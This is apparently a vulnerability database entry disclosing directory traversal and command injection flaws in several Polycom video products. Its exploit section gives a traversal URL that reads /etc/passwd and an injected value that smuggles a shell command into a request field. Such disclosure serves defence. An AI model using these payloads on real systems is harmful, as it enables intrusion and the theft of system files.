ID
VAR-E-201203-0965
TITLE
Polycom Products Directory Traversal and Command Injection Vulnerabilities
Trust: 0.3
DESCRIPTION
Multiple Polycom products are prone to a directory-traversal vulnerability and a command-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
Remote attackers can use a specially crafted request with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application. Also, attackers can execute arbitrary commands with the privileges of the user running the application.
Trust: 0.3
AFFECTED PRODUCTS
| vendor: | polycom | model: | web management interface g3/hdx hd | scope: | eq | version: | 8000 | Trust: 0.3 |
| vendor: | polycom | model: | linux development platform 2.14.g3 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | polycom | model: | hdx video end points | scope: | eq | version: | 2.6 | Trust: 0.3 |
| vendor: | polycom | model: | hdx | scope: | eq | version: | 80000 | Trust: 0.3 |
| vendor: | polycom | model: | durango build | scope: | eq | version: | 2.64740 | Trust: 0.3 |
| vendor: | polycom | model: | durango | scope: | eq | version: | 2.6 | Trust: 0.3 |
| vendor: | polycom | model: | uc apl 2.7.1.j | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | polycom | model: | hdx video end points | scope: | ne | version: | 3.0.4 | Trust: 0.3 |
| vendor: | polycom | model: | hdx video end points | scope: | ne | version: | 3.0 | Trust: 0.3 |
EXPLOIT
Attackers can exploit these issues through a browser.
The following example exploits are available:
For the directory traversal vulnerability:
http://www.example.com/a_getlog.cgi?name=../../../etc/passwd
For the command injection vulnerability:
127.0.0.1 ; ps -ef > /tmp/command_injection.txt #
Bullet list:
<li><a href="/data/vulnerabilities/exploits/52301.rb">/data/vulnerabilities/exploits/52301.rb</a></li>
Trust: 0.3
PRICE
Free
Trust: 0.3
TYPE
Input Validation Error
Trust: 0.3
CREDITS
João Paulo Caldas Campello
Trust: 0.3
EXTERNAL IDS
| db: | BID | id: | 52301 | Trust: 0.3 |
REFERENCES
| url: | http://blog.tempest.com.br/joao-paulo-campello/path-traversal-on-polycom-web-management-interface.html | Trust: 0.3 |
| url: | http://www.polycom.com/ | Trust: 0.3 |
| url: | http://seclists.org/fulldisclosure/2012/mar/18?utm_source=twitterfeed&utm_medium=twitter | Trust: 0.3 |
| url: | http://blog.tempest.com.br/joao-paulo-campello/polycom-web-management-interface-os-command-injection.html | Trust: 0.3 |
SOURCES
| db: | BID | id: | 52301 |
LAST UPDATE DATE
2022-07-27T09:22:10.953000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 52301 | date: | 2013-02-13T09:01:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 52301 | date: | 2012-03-05T00:00:00 |